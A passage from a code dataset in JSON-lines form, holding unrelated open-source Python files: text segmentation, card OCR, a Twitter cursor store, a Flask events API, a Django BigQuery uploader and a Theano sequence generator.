Parameters\n    ----------\n    path: str\n        file path\n    data_name: str\n        text name\n    Returns\n    -------\n    None\n        cut the passage and write\n    \"\"\"\n    source_file = path + '/' + data_name    # data name\n    source = codecs.open(source_file, 'r', encoding='utf-8')\n\n    out_path = path + '/out_file/'\n    if os.path.exists(out_path) is not True:\n        os.makedirs(out_path)\n\n    out_file = out_path + data_name\n    if os.path.exists(out_file):\n        os.remove(out_file)\n\n    stop_dict = []    # stop dict\n    with open('stop_words_dict.txt', 'r', encoding='utf-8') as dic:\n        line = dic.readline()\n        while line != \"\":\n            line = line.rstrip('\n')\n            stop_dict.append(line)\n            line = dic.readline()\n\n    out = codecs.open(out_file, 'w', 'utf-8')\n    line = source.readline()\n    while line != \"\":\n        line = line.rstrip('\n')\n        line = line.replace('\t', '').replace('\n', '').replace(' ', '')    # str.replace returns a new string\n        seg_list = list(jieba.cut(line, cut_all=False))    # cut the passage\n        # filter stop words without mutating seg_list while iterating over it\n        seg_list = [word for word in seg_list if word not in stop_dict]\n        output = ' '.join(seg_list)\n        print(output)\n        out.write(output)\n        line = source.readline()\n    print('END ALL')\n\n# ----------------------------------------------------\n# main\n\n\nif __name__ == '__main__':\n    file_path = os.getcwd() + '/lib/text_data/my_use/'\n    file_list = glob.iglob(file_path + '*.txt')\n    for file in file_list:\n        file_name = file.split('\\\\')[-1]\n        file_cut(file_path, file_name)\n\n    # file_cut(file_path, '我杀了他.txt')","repo_name":"LeonHardt427/mining_Higashino","sub_path":"jieba_cut.py","file_name":"jieba_cut.py","file_ext":"py","file_size_in_byte":2082,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"17634261850","text":"import os\nfrom typing import Optional, Any\n\nfrom algo_ops.ops.op import Op\nfrom algo_ops.pipeline.pipeline import Pipeline\nfrom ocr_ops.framework.op.abstract_ocr_op import EasyOCROp\nfrom ocr_ops.framework.op.ffmpeg_op import FFMPEGOp\nfrom ocr_ops.framework.pipeline.ocr_pipeline import OCRMethod\nfrom ocr_ops.instances import ocr\n\nfrom card_recognizer.api.operating_mode import OperatingMode\nfrom card_recognizer.classifier.core.word_classifier import WordClassifier\nfrom card_recognizer.pulls_estimator.pulls_estimator import PullsEstimator\nfrom card_recognizer.pulls_estimator.pulls_summary import PullsSummary\nfrom card_recognizer.reference.core.build import ReferenceBuild\n\n\nclass CardRecognizer(Pipeline):\n    def __init__(\n        self,\n        set_name: Optional[str] = \"master\",\n        classification_method: str = \"shared_words\",\n        mode: OperatingMode = OperatingMode.SINGLE_IMAGE,\n        min_run_length: Optional[int] = 5,\n        min_run_conf: Optional[float] = 0.1,\n        run_tol: Optional[int] = 10,\n    ):\n        # load classifier\n        ref_pkl_path = ReferenceBuild.get_set_pkl_path(set_name=set_name)\n        self.classifier = WordClassifier(\n            ref_pkl_path=ref_pkl_path,\n            vect_method=\"encapsulation_match\",\n            classification_method=classification_method,\n        )\n\n        # load OCR pipeline\n        if mode in [\n            OperatingMode.IMAGE_DIR,\n            OperatingMode.VIDEO,\n            OperatingMode.PULLS_IMAGE_DIR,\n            OperatingMode.PULLS_VIDEO,\n            OperatingMode.BOOSTER_PULLS_IMAGE_DIR,\n            OperatingMode.BOOSTER_PULLS_VIDEO,\n        ]:\n            store_intermediate_images = False\n        else:\n            store_intermediate_images = True\n        self.ocr_pipeline = ocr.basic_ocr_with_text_cleaning_pipeline(\n            vocab_words=self.classifier.reference.vocab(),\n            ocr_method=OCRMethod.EASYOCR,\n            store_intermediate_images=store_intermediate_images,\n        )\n\n        # make pipeline\n        if mode == OperatingMode.VIDEO:\n            ops = [FFMPEGOp(), self.ocr_pipeline, 
self.classifier]\n elif mode == OperatingMode.SINGLE_IMAGE:\n ops = [\n self.ocr_pipeline,\n self.classifier,\n ]\n elif mode == OperatingMode.IMAGE_DIR:\n ops = [\n self.ocr_pipeline,\n self.classifier,\n ]\n elif mode == OperatingMode.PULLS_IMAGE_DIR:\n ops = [\n self.ocr_pipeline,\n self.classifier,\n PullsEstimator(\n min_run_length=min_run_length,\n min_run_conf=min_run_conf,\n run_tol=run_tol,\n num_cards_to_select=None,\n ),\n PullsSummary(operating_mode=mode),\n ]\n elif mode == OperatingMode.PULLS_VIDEO:\n ops = [\n FFMPEGOp(),\n self.ocr_pipeline,\n self.classifier,\n PullsEstimator(\n min_run_length=min_run_length,\n min_run_conf=min_run_conf,\n run_tol=run_tol,\n num_cards_to_select=None,\n figs_paging=True,\n ),\n PullsSummary(operating_mode=mode),\n ]\n elif mode == OperatingMode.BOOSTER_PULLS_IMAGE_DIR:\n ops = [\n self.ocr_pipeline,\n self.classifier,\n PullsEstimator(\n min_run_length=min_run_length,\n min_run_conf=min_run_conf,\n run_tol=run_tol,\n ),\n PullsSummary(operating_mode=mode),\n ]\n elif mode == OperatingMode.BOOSTER_PULLS_VIDEO:\n ops = [\n FFMPEGOp(),\n self.ocr_pipeline,\n self.classifier,\n PullsEstimator(\n min_run_length=min_run_length,\n min_run_conf=min_run_conf,\n run_tol=run_tol,\n ),\n PullsSummary(operating_mode=mode),\n ]\n else:\n raise ValueError(\"Unsupported mode: \" + str(mode))\n super().__init__(ops=ops)\n\n def find_op_by_class(self, op_class: Any) -> Optional[Op]:\n for op in self.ops.values():\n if isinstance(op, op_class):\n return op\n return None\n\n def set_output_path(self, output_path: Optional[str] = None):\n \"\"\"\n Set output path for results.\n \"\"\"\n ffmpeg_op = self.find_op_by_class(op_class=FFMPEGOp)\n if ffmpeg_op is not None:\n ffmpeg_op.image_out_path = os.path.join(\n output_path, \"uncompressed_video_frames\"\n )\n pulls_estimator_op = self.find_op_by_class(op_class=PullsEstimator)\n if pulls_estimator_op is not None:\n pulls_estimator_op.output_fig_path = output_path\n autosave_path = os.path.join(output_path, \"ocr_bounding_boxes\")\n self.ocr_pipeline.ocr_op.autosave_output_img_path = autosave_path\n\n def set_summary_file(self, summary_file: str):\n \"\"\"\n Set summary file.\n \"\"\"\n pulls_summary_op = self.find_op_by_class(op_class=PullsSummary)\n if pulls_summary_op is None:\n raise ValueError(\"There is no pulls summary op found in this pipeline.\")\n if pulls_summary_op is not None:\n pulls_summary_op.summary_file = summary_file\n\n def to_pickle(self, out_pkl_path: str) -> None:\n # temporarily remove un-pickleable elements\n easy_ocr_instance = None\n if isinstance(self.ocr_pipeline.ocr_op, EasyOCROp):\n easy_ocr_instance = self.ocr_pipeline.ocr_op.easy_ocr_reader\n self.ocr_pipeline.ocr_op.easy_ocr_reader = None\n\n # super call to pickle\n super().to_pickle(out_pkl_path=out_pkl_path)\n\n # restore state\n if isinstance(self.ocr_pipeline.ocr_op, EasyOCROp):\n self.ocr_pipeline.ocr_op.easy_ocr_reader = easy_ocr_instance\n","repo_name":"prateekt/pokemon-card-recognizer","sub_path":"card_recognizer/api/card_recognizer.py","file_name":"card_recognizer.py","file_ext":"py","file_size_in_byte":6117,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"40797303088","text":"from bot.app.controllers.logger import *\nimport bot.app.config as config\nfrom datetime import datetime, timedelta, timezone\nfrom google.cloud import datastore\nimport json\n\n# Start logger\nlogger = logging.getLogger(__name__)\n\n\n# Define a model class to store data in Google Cloud 
Firestore (using Datastore compatibility)\nclass TwitterCursor(object):\n \"\"\"\n This class creates an object that stores ID number of the last tweet retrieved from Twitter servers, as well as the\n date and time it was last modified. Its methods not only allow you to get, set, and update its data in the database,\n but also to import/export as a dictionary, export as JSON, as well as checking if the data is recent enough or you\n should reload it from the database.\n \"\"\"\n\n def __init__(self, last_id=1):\n \"\"\"\n This method initialises an instance by storing a tweet ID number and recording the date and time of its\n creation. The ID number can be either provided at creation time or it will default to 1 (int) as it would be\n the case if your bot has just been activated in a new account. In case that you enable this bot in an already\n existent account you should visit the URL that only checks mentions to make sure of overwrite the default value\n with the actual last tweet ID number!\n\n :param last_id: The tweet ID number that should be set as a cursor for future request to the Twitter API\n :type last_id: int\n \"\"\"\n\n # Log informational message\n logger.info(msg='Started a new TwitterCursor instance')\n\n # Start the datastore client instance\n self.db_client = datastore.Client()\n\n # Log informational message\n logger.info(msg='Started a new datastore client instance')\n\n # Set a single default entity key so that the entity is always assigned the same record (number 1) in datastore\n # because there's no need to store this datum more than once\n self.entity_key = self.db_client.key('tw_cursor_last_id', 1)\n\n # Check first if there's any cursor data recorded in the datastore, in case that the bot is restarting\n db_data = self.get_from_db()\n\n # If data is absent from datastore, then set default values because this is the first time the bot has ran\n if db_data is None:\n self.last_id = last_id\n self.creation_time = datetime.now(tz=timezone.utc)\n else:\n # Otherwise, set the cursor using the data from the datastore\n self.last_id = db_data['last_id']\n self.creation_time = db_data['creation_time']\n\n def get(self, obj_property):\n \"\"\"\n This method gets the current instance data and returns the requested property.\n\n :param obj_property: The specific property that should be returned\n :type obj_property: str or int\n :return: The current data for that cursor property\n :rtype: str or int\n \"\"\"\n\n # Map the cursor properties to possible parameter names to ensure returning the correct one\n obj_map = {'last_id': self.last_id, 'creation_time': self.creation_time}\n\n # Return requested datum\n return obj_map[obj_property]\n\n def set(self, obj_property, value):\n \"\"\"\n This method sets the provided value for the requested property in the current instance.\n\n :param obj_property: The cursor property whose value should be overwritten\n :type obj_property: str\n :param value: The new value that should overwrite the current data for a given property\n :type value: int or datetime\n :return: An informational message stating success or False\n :rtype: str or bool\n \"\"\"\n\n # Log debugging information\n logger.debug(msg='Cursor set method received this for value: {0}'.format(value))\n logger.debug(msg='Cursor set method received this for type(value): {0}'.format(type(value)))\n\n # Set new value into property and exit\n if setattr(self, obj_property, value):\n return 'OK'\n else:\n return False\n\n def to_dict(self):\n \"\"\"\n Get the current cursor data and 
return it as a dictionary.\n\n        :return: Cursor data as a dictionary\n        :rtype: dict\n        \"\"\"\n\n        # Return data\n        return {'creation_time': self.creation_time, 'last_id': self.last_id}\n\n    def from_dict(self, dict_data):\n        \"\"\"\n        Import data from a dictionary and overwrite current values for any property.\n\n        :param dict_data: Dictionary containing cursor data\n        :type dict_data: dict[str or int]\n        :return: True\n        :rtype: bool\n        \"\"\"\n\n        # Iterate over the dictionary data and set new values\n        for item in dict_data:\n            setattr(self, item, dict_data[item])\n\n        # Return success signal\n        return True\n\n    def to_json(self, indented=True):\n        \"\"\"\n        This method gets the current cursor data and returns it in JSON format.\n\n        :param indented: Whether the JSON data returned should be indented for pretty-printing\n        :type indented: bool\n        :return: Current cursor data in JSON format\n        :rtype: str\n        \"\"\"\n\n        # Convert the cursor properties to a dictionary and set values as data types that can be exported in JSON format\n        structure = {'creation_time': self.creation_time.isoformat(), 'last_id': self.last_id}\n\n        # Check whether data should be indented or not and return it\n        if indented:\n            return json.dumps(structure, indent=4, sort_keys=True)\n        else:\n            return json.dumps(structure, sort_keys=True)\n\n    def from_json(self, json_data):\n        \"\"\"\n        This method imports data provided in JSON format and overwrites current values for any cursor property.\n\n        :param json_data: Cursor data provided in JSON format\n        :type json_data: str\n        :return: An informational message\n        :rtype: str\n        \"\"\"\n\n        # Load JSON data in a temporary variable\n        cursor_data = json.loads(json_data)\n\n        # Overwrite current property values with new ones; json.loads returns a\n        # dict, so use key access, and fromisoformat takes its argument positionally\n        self.last_id = cursor_data['last_id']\n        self.creation_time = datetime.fromisoformat(cursor_data['creation_time'])\n\n        # Return informational message\n        return 'json data imported'\n\n    def send_to_db(self):\n        \"\"\"\n        Store current cursor data into the database and return a copy of it.\n\n        :return: A copy of the current cursor data that was sent to database\n        \"\"\"\n\n        # Create a new datastore entity\n        data_item = datastore.Entity(key=self.entity_key)\n\n        # Get current cursor data\n        cursor_data = self.to_dict()\n\n        # Log debugging messages\n        logger.debug(msg='data_item entity is: {0}'.format(data_item))\n        logger.debug(msg='cursor_data is: {0}'.format(cursor_data))\n        logger.debug(msg='type(cursor_data) is: {0}'.format(type(cursor_data)))\n\n        # Populate datastore entity with current cursor data\n        data_item.update(cursor_data)\n\n        # Store datastore entity in the database\n        self.db_client.put(entity=data_item)\n\n        # Return a copy of current cursor data\n        return {'item_id': str(data_item.id), 'cursor_data': cursor_data}\n\n    def get_from_db(self):\n        \"\"\"\n        Retrieve cursor data directly from the datastore and return it.\n\n        :return: Cursor data as it is stored in the database\n        :rtype: dict\n        \"\"\"\n\n        # Get cursor data from the database\n        db_data = self.db_client.get(key=self.entity_key)\n\n        # Log debugging information\n        logger.debug(msg='Retrieved cursor data from db: {0}'.format(repr(db_data)))\n\n        # Return cursor data\n        return db_data\n\n    def update_from_db(self):\n        \"\"\"\n        This method retrieves the cursor data stored in the database and updates current cursor values with those in\n        the database.\n\n        :return: If database is not empty, return cursor data. 
Otherwise return None\n :rtype: dict or None\n \"\"\"\n db_data = self.db_client.get(key=self.entity_key)\n logger.info(msg='Retrieved cursor data from db: {0}'.format(repr(db_data)))\n\n if db_data is not None:\n self.from_dict(dict_data=db_data)\n\n return {'last_id': self.last_id, 'creation_time': self.creation_time}\n else:\n return None\n\n def is_it_recent(self):\n \"\"\"\n This method checks whether the current values of the cursor instance are reasonably recent (i.e. less than\n twice the twitter_interval setting in the config.py module). If it's not, you should get the cursor data from\n the database in case another instance from your app in GAE has been active as well. Otherwise, you may end up\n replying twice to the same tweet mention.\n\n :return: Confirmation of whether this cursor instance holds recent data or not\n :rtype: bool\n \"\"\"\n\n # Get current date and time from the operating system\n now = datetime.now(tz=timezone.utc)\n\n # Calculate the date and time difference between now and the data stored in the cursor\n delta = now - self.creation_time\n\n # Calculate if the magnitude of the difference exceeds the threshold\n interval = timedelta(minutes=2 * config.twitter_interval)\n\n # Make a decision and return it\n if delta > interval:\n return False\n else:\n return True\n","repo_name":"tiktaalik-dev/Event-Info-Bot","sub_path":"bot/app/models/twitter.py","file_name":"twitter.py","file_ext":"py","file_size_in_byte":9573,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"45173142407","text":"import os\nfrom flask import Flask, request, abort, jsonify\nfrom flask_sqlalchemy import SQLAlchemy\nfrom models import setup_db, Location, Event\nfrom flask_cors import CORS\nfrom auth import AuthError, requires_auth\n\ndef create_app(test_config=None):\n # create and configure the app\n app = Flask(__name__)\n setup_db(app)\n CORS(app)\n\n @app.after_request\n def after_request(response):\n response.headers.add('Access-Control-Allow-Headers', 'Content-Type,Authorization,true')\n response.headers.add('Access-Control-Allow-Methods', 'GET,PATCH,POST,DELETE,OPTIONS')\n return response\n \n @app.route('/')\n def get_greeting():\n # excited = os.environ['EXCITED']\n greeting = \"Hello !!!\" \n return greeting\n\n @app.route('/locations', methods=['GET'])\n @requires_auth('get:locations')\n def locations(jwt):\n locations = Location.query.order_by(Location.id).all()\n data = []\n for location in locations:\n data.append({\n \"id\": location.id,\n \"name\": location.name,\n \"location\": location.location\n })\n\n if len(locations) == 0:\n abort(404)\n else:\n format_locations = [location.format() for location in locations]\n\n return jsonify({\n 'success': True,\n 'locations': format_locations, \n 'total_locations': len(format_locations),\n })\n\n @app.route('/locations', methods=['POST'])\n @requires_auth('post:locations')\n def add_location(jwt):\n body = request.get_json()\n new_name = body.get('name', None)\n new_location = body.get('location', None)\n\n try:\n location = Location(name=new_name, location=new_location)\n print(location)\n location.insert()\n\n return jsonify({\n 'success': True,\n })\n except Exception as e: \n print(e)\n\n @app.route('/events', methods=['GET'])\n @requires_auth('get:events')\n def events(jwt):\n events = Event.query.order_by(Event.id).all()\n data = []\n for event in events:\n data.append({\n \"id\": event.id,\n \"name\": event.name,\n \"location\": event.location\n })\n\n if len(events) 
== 0:\n            abort(404)\n        else:\n            formatted_events = [event.format() for event in events]\n            return jsonify({\n                'success': True,\n                'events': formatted_events,\n                'data': data,\n                'total_events': len(formatted_events),\n            })\n    \n    @app.route('/events', methods=['POST'])\n    @requires_auth('post:events')\n    def add_event(jwt):\n        body = request.get_json()\n        new_name = body.get('name', None)\n        new_location = body.get('location', None)\n\n        try:\n            event = Event(name=new_name, location=new_location)\n            print(event)\n            event.insert()\n\n            return jsonify({\n                'success': True,\n            })\n        except Exception as e: \n            print(e)\n\n\n    @app.route('/events/<int:id>', methods=['PATCH'])\n    @requires_auth('patch:events')\n    def update_event(jwt, id):\n        try:\n            event = Event.query.filter(Event.id == id).one_or_none()\n\n            if event is None:\n                abort(404)\n            \n            new_name = request.json.get(\"name\")\n            new_location = request.json.get(\"location\")\n            event.name = new_name\n            event.location = new_location\n            event.update()\n            events = Event.query.order_by(Event.id).all()\n            events_formatted = [event.format() for event in events]\n\n            return jsonify({\n                \"success\": True,\n                \"events\": events_formatted\n            }), 200\n        except Exception as e: \n            print(e)\n\n    @app.route('/events/<int:id>', methods=['DELETE'])\n    @requires_auth('delete:events')\n    def delete_event(jwt, id):\n        try:\n            event = Event.query.filter(Event.id == id).one_or_none()\n\n            if event is None:\n                abort(404)\n\n            event.delete()\n\n            return jsonify({\n                'success': True,\n                'delete': id\n            }), 200\n        except:\n            abort(422)\n    \n    @app.errorhandler(404)\n    def not_found(error):\n        return jsonify({\n            \"success\": False, \n            \"error\": 404,\n            \"message\": \"Resource not found!\"\n        }), 404\n\n    @app.errorhandler(422)\n    def unprocessable(error):\n        return jsonify({\n            \"success\": False, \n            \"error\": 422,\n            \"message\": \"Unprocessable!\"\n        }), 422\n\n    @app.errorhandler(400)\n    def bad_request(error):\n        return jsonify({\n            \"success\": False, \n            \"error\": 400,\n            \"message\": \"Bad request!\"\n        }), 400\n\n    @app.errorhandler(405)\n    def method_not_allowed(error):\n        return jsonify({\n            \"success\": False, \n            \"error\": 405,\n            \"message\": \"Method not allowed!\"\n        }), 405\n\n    @app.errorhandler(AuthError)\n    def auth_error(e):\n        print(e)\n        return jsonify({\n            \"success\": False,\n            \"error\": e.status_code,\n            \"message\": e.error\n        }), e.status_code\n\n    return app\n\napp = create_app()\n\nif __name__ == '__main__':\n    app.run(host='0.0.0.0', port=8080, debug=True)\n    ","repo_name":"Leny73/fsnd","sub_path":"projects/capstone/starter/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":5155,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"3291265236","text":"f = open(\"/home/student/PycharmProjects/Vex1cK's/4353.txt\")\na = []\nmk = 0\nk = 0\nfor s in f:\n    a.append(int(s))\nfor i in range(len(a)-1):\n    if str(a[i])[-1] == \"5\":\n        if str(a[i+1])[-1] == \"5\":\n            k+=1\n            mk = max(mk,a[i]+a[i+1])\nprint(k,mk)\n\n\n","repo_name":"olgaObnosova/EGE","sub_path":"№17/4353.py","file_name":"4353.py","file_ext":"py","file_size_in_byte":272,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"35545731934","text":"__author__ = \"Kyle Vitautas Lopin\"\n\n# standard libraries\nimport filecmp\nimport os\nimport unittest\nfrom unittest import mock\n\n# local files\nimport amp_frame\nimport graph_properties\nimport properties\n\nFILE_DIR = os.path.dirname(os.path.realpath(__file__))\nSOLN_FILE = os.path.join(FILE_DIR, 'test1_soln.csv')\nSAVED_FILE = 
os.path.join(FILE_DIR, 'test.csv')\n\n\nclass TestAmpFrame(unittest.TestCase):\n @classmethod\n @mock.patch(\"amp_frame.AmpFrame.make_graph_area\")\n def setUpClass(cls, mocked_graph) -> None:\n cls.mocked_root = mock.Mock()\n cls.mocked_root.frames = [mock.Mock(), mock.Mock()]\n cls.mocked_root.device_params = properties.DeviceParameters()\n print(dir(cls.mocked_root))\n graph_props = graph_properties.GraphProps()\n cls.amp_frame = amp_frame.AmpFrame(cls.mocked_root, None, graph_props)\n\n @classmethod\n def tearDownClass(cls) -> None:\n if os.path.exists(SAVED_FILE):\n os.remove(SAVED_FILE)\n\n def test_save_data(self):\n device = mock.Mock()\n device.time = [1, 2, 3]\n device.data = [11, 12, 13]\n with mock.patch('amp_frame.open_file') as mock_open:\n mock_open.return_value = SAVED_FILE\n self.amp_frame.save_data(device)\n self.assertTrue(filecmp.cmp(SAVED_FILE, SOLN_FILE))\n","repo_name":"KyleLopin/Potentiostat_GUI","sub_path":"tests/unit_tests/test_amp_frame.py","file_name":"test_amp_frame.py","file_ext":"py","file_size_in_byte":1321,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"72"} +{"seq_id":"15217321236","text":"# encoding: utf-8\nfrom django.db import models\nfrom google.cloud import bigquery\nimport os\nimport json\nimport csv\nBASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\nMEDIA_ROOT = \"django-jquery-file-upload/media\"\n\nclass Picture(models.Model):\n \"\"\"This is a small demo using just two fields. The slug field is really not\n necessary, but makes the code simpler. ImageField depends on PIL or\n pillow (where Pillow is easily installable in a virtualenv. If you have\n problems installing pillow, use a more generic FileField instead.\n\n \"\"\"\n file = models.FileField(upload_to=\"pictures\")\n slug = models.SlugField(max_length=50, blank=True)\n\n def __str__(self):\n return self.file.name\n\n @models.permalink\n def get_absolute_url(self):\n return ('upload-new', )\n\n def save(self, *args, **kwargs):\n self.slug = self.file.name\n super(Picture, self).save(*args, **kwargs)\n print(\"Uploading data to BIG Query\")\n self.upload_to_big_query(os.path.join( BASE_DIR, MEDIA_ROOT, self.file.name))\n\n def delete(self, *args, **kwargs):\n \"\"\"delete -- Remove to leave file.\"\"\"\n self.file.delete(False)\n super(Picture, self).delete(*args, **kwargs)\n\n def parse_file(self, file_path):\n data_rows = []\n with open(file_path, 'rb') as csvfile:\n r = csv.reader(csvfile, delimiter=',', quotechar='|')\n for row in r:\n if len(row) == 7 and \"Electric usage\" in row[0]:\n row_item = {}\n row_item[\"zip\"] = zipcode\n row_item[\"type\"] = row[0]\n row_item[\"date\"] = row[1]\n row_item[\"start\"] = row[2]\n row_item[\"end\"] = row[3]\n row_item[\"usage\"] = row[4]\n row_item[\"units\"] = row[5]\n data_rows.append(json.loads(json.dumps(row_item)))\n elif \"Address\" in row:\n zipcode = self.get_zipcode(row)\n return data_rows\n\n def get_zipcode(self, address):\n return address[-1].split()[1].strip('\\\"')\n\n def upload_to_big_query(self, file_path):\n # DO CSV Stuff for content\n rows = self.parse_file(file_path)\n bigquery_client = bigquery.Client()\n dataset_ref = bigquery_client.dataset(\"gbd_store\")\n table_ref = dataset_ref.table(\"pge_electric\")\n table = bigquery_client.get_table(table_ref)\n errors = bigquery_client.create_rows(table, rows)\n if not errors:\n print(\"Successfully uploaded data to big query\")\n else:\n print(\"ERRORS:\")\n 
print(errors)\n","repo_name":"supriya-premkumar/GreenButtonData","sub_path":"fileupload/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2687,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"70020025514","text":"from theano import tensor\r\n\r\nfrom blocks.bricks import Initializable, Random, Bias, NDimensionalSoftmax\r\nfrom blocks.bricks.base import application, Brick, lazy\r\nfrom blocks.bricks.parallel import Fork, Merge\r\nfrom blocks.bricks.lookup import LookupTable\r\nfrom blocks.bricks.recurrent import recurrent\r\nfrom blocks.roles import add_role, COST\r\nfrom blocks.utils import dict_union, dict_subset\r\nfrom blocks.bricks.sequence_generators import (\r\n BaseSequenceGenerator, FakeAttentionRecurrent)\r\nfrom attention_with_topicalq import AttentionRecurrent\r\n\r\nfrom blocks.bricks.wrappers import WithExtraDims\r\n\r\nclass PickTargetProb(Brick):\r\n \"\"\"A softmax brick.\r\n\r\n Works with 2-dimensional inputs only. If you need more,\r\n see :class:`NDimensionalSoftmax`.\r\n \"\"\"\r\n\r\n @application(inputs=['y', 'x'], outputs=['cost'])\r\n def apply(self, application_call, y, x):\r\n if y.ndim == x.ndim - 1:\r\n print(\"y.ndim == x.ndim - 1\");\r\n indices = tensor.arange(y.shape[0]) * x.shape[1] + y\r\n cost = x.flatten()[indices]\r\n else:\r\n raise TypeError('rank mismatch between x and y')\r\n return cost\r\n\r\n\r\nclass NDPickTargetProb(PickTargetProb):\r\n decorators = [WithExtraDims()]\r\n\r\nclass SelectTarget(Random):\r\n\r\n @application\r\n def emit(self, probs):\r\n batch_size = probs.shape[0]\r\n pvals_flat = probs.reshape((batch_size, -1))\r\n generated = self.theano_rng.multinomial(pvals=pvals_flat)\r\n return generated.reshape(probs.shape).argmax(axis=-1)\r\n\r\n @application\r\n def cost(self, y,x):\r\n indices = tensor.arange(y.shape[0]) * x.shape[1] + y\r\n cost = x.flatten()[indices]\r\n\r\n return cost\r\n\r\n\r\nclass SequenceGenerator(BaseSequenceGenerator):\r\n r\"\"\"A more user-friendly interface for :class:`BaseSequenceGenerator`.\r\n\r\n Parameters\r\n ----------\r\n readout : instance of :class:`AbstractReadout`\r\n The readout component for the sequence generator.\r\n transition : instance of :class:`.BaseRecurrent`\r\n The recurrent transition to be used in the sequence generator.\r\n Will be combined with `attention`, if that one is given.\r\n attention : object, optional\r\n The attention mechanism to be added to ``transition``,\r\n an instance of\r\n :class:`~blocks.bricks.attention.AbstractAttention`.\r\n add_contexts : bool\r\n If ``True``, the\r\n :class:`.AttentionRecurrent` wrapping the\r\n `transition` will add additional contexts for the attended and its\r\n mask.\r\n \\*\\*kwargs : dict\r\n All keywords arguments are passed to the base class. 
If `fork`\r\n keyword argument is not provided, :class:`.Fork` is created\r\n that forks all transition sequential inputs without a \"mask\"\r\n substring in them.\r\n\r\n \"\"\"\r\n def __init__(self, readout,topicWordReadout,topic_vector_names, transition,topical_name,content_name,q_dim,q_name, attention=None,topical_attention=None,\r\n use_step_decay_cost=False,\r\n use_doubly_stochastic=False, lambda_ds=0.001,\r\n use_concentration_cost=False, lambda_ct=10,\r\n use_stablilizer=False, lambda_st=50,\r\n add_contexts=True, **kwargs):\r\n self.use_doubly_stochastic = use_doubly_stochastic\r\n self.use_step_decay_cost = use_step_decay_cost\r\n self.use_concentration_cost = use_concentration_cost\r\n self.use_stablilizer = use_stablilizer\r\n self.lambda_ds = lambda_ds\r\n self.lambda_ct = lambda_ct\r\n self.lambda_st = lambda_st\r\n normal_inputs = [name for name in transition.apply.sequences\r\n if 'mask' not in name]\r\n kwargs.setdefault('fork', Fork(normal_inputs))\r\n if attention:\r\n transition = AttentionRecurrent(\r\n transition, attention,topical_attention,topical_attended_name='topical_attended',topical_attended_mask_name='topical_attended_mask',content_name=content_name,topical_name=topical_name,\r\n add_contexts=add_contexts, name=\"att_trans\")\r\n else:\r\n transition = FakeAttentionRecurrent(transition,\r\n name=\"with_fake_attention\")\r\n\r\n self.topicWordReadout=topicWordReadout;\r\n self._topic_vector_names=topic_vector_names;\r\n self.probPick=NDPickTargetProb();\r\n self.sampleTarget=SelectTarget();\r\n #self._q_names=[q_name];\r\n self.topical_name=topical_name;\r\n self.content_name=content_name;\r\n self._topical_context_names=['topical_attended','topical_attended_mask'];\r\n super(SequenceGenerator, self).__init__(\r\n readout, transition, **kwargs)\r\n self.children+=[self.topicWordReadout,self.probPick,self.sampleTarget];\r\n\r\n def _push_allocation_config(self):\r\n\r\n super(SequenceGenerator, self)._push_allocation_config();\r\n transition_sources = (self._state_names + self._context_names +\r\n self._glimpse_names)\r\n self.topicWordReadout.source_dims = [self.transition.get_dim(name)\r\n if name in transition_sources\r\n else self.readout.get_dim(name)\r\n for name in self.readout.source_names]\r\n self.topicWordReadout.push_allocation_config()\r\n\r\n @application\r\n def cost_matrix(self, application_call, outputs,tw_outputs, tw_binary,mask=None, **kwargs):\r\n \"\"\"Returns generation costs for output sequences.\r\n\r\n See Also\r\n --------\r\n :meth:`cost` : Scalar cost.\r\n\r\n \"\"\"\r\n # We assume the data has axes (time, batch, features, ...)\r\n batch_size = outputs.shape[1]\r\n\r\n # Prepare input for the iterative part\r\n states = dict_subset(kwargs, self._state_names, must_have=False)\r\n # masks in context are optional (e.g. 
`attended_mask`)\r\n contexts = dict_subset(kwargs, self._context_names, must_have=False)\r\n topical_word_contexts=dict_subset(kwargs, self._topical_context_names)\r\n topical_embeddings=dict_subset(kwargs,[self.topical_name]);\r\n content_embeddings=dict_subset(kwargs,[self.content_name]);\r\n #q=dict_subset(kwargs, self._q_names, must_have=True,pop=True);\r\n feedback = self.readout.feedback(outputs)\r\n inputs = self.fork.apply(feedback, as_dict=True)\r\n\r\n # Run the recurrent network\r\n results = self.transition.apply(\r\n mask=mask, return_initial_states=True, as_dict=True,\r\n **dict_union(inputs, states, contexts,topical_word_contexts,topical_embeddings,content_embeddings))\r\n\r\n # Separate the deliverables. The last states are discarded: they\r\n # are not used to predict any output symbol. The initial glimpses\r\n # are discarded because they are not used for prediction.\r\n # Remember, glimpses are computed _before_ output stage, states are\r\n # computed after.\r\n states = {name: results[name][:-1] for name in self._state_names}\r\n glimpses = {name: results[name][1:] for name in self._glimpse_names}\r\n glimpses_modified={'weighted_averages':glimpses['weighted_averages'],'weigths':glimpses['weights']}\r\n\r\n # Compute the cost\r\n feedback = tensor.roll(feedback, 1, 0)\r\n feedback = tensor.set_subtensor(\r\n feedback[0],\r\n self.readout.feedback(self.readout.initial_outputs(batch_size)))\r\n readouts = self.readout.readout(\r\n feedback=feedback, **dict_union(states, glimpses_modified, contexts))\r\n #costs = self.readout.cost(readouts, outputs)\r\n\r\n #topicSumVec = dict_subset(kwargs, self._topic_vector_names, must_have=True);\r\n twReadouts=self.topicWordReadout.readout(feedback=feedback,**dict_union(states,glimpses_modified, contexts));\r\n twExp=tensor.exp(twReadouts);\r\n rwExp=tensor.exp(readouts);\r\n Z=twExp.sum(keepdims=True,axis=2)+rwExp.sum(keepdims=True,axis=2);#remains uncertain,keepdims, and the # of axis\r\n twExp/=Z;\r\n rwExp/=Z;\r\n twCost=self.probPick.apply(tw_outputs,twExp,extra_ndim=twExp.ndim - 2);\r\n rwCost=self.probPick.apply(outputs,rwExp,extra_ndim=rwExp.ndim - 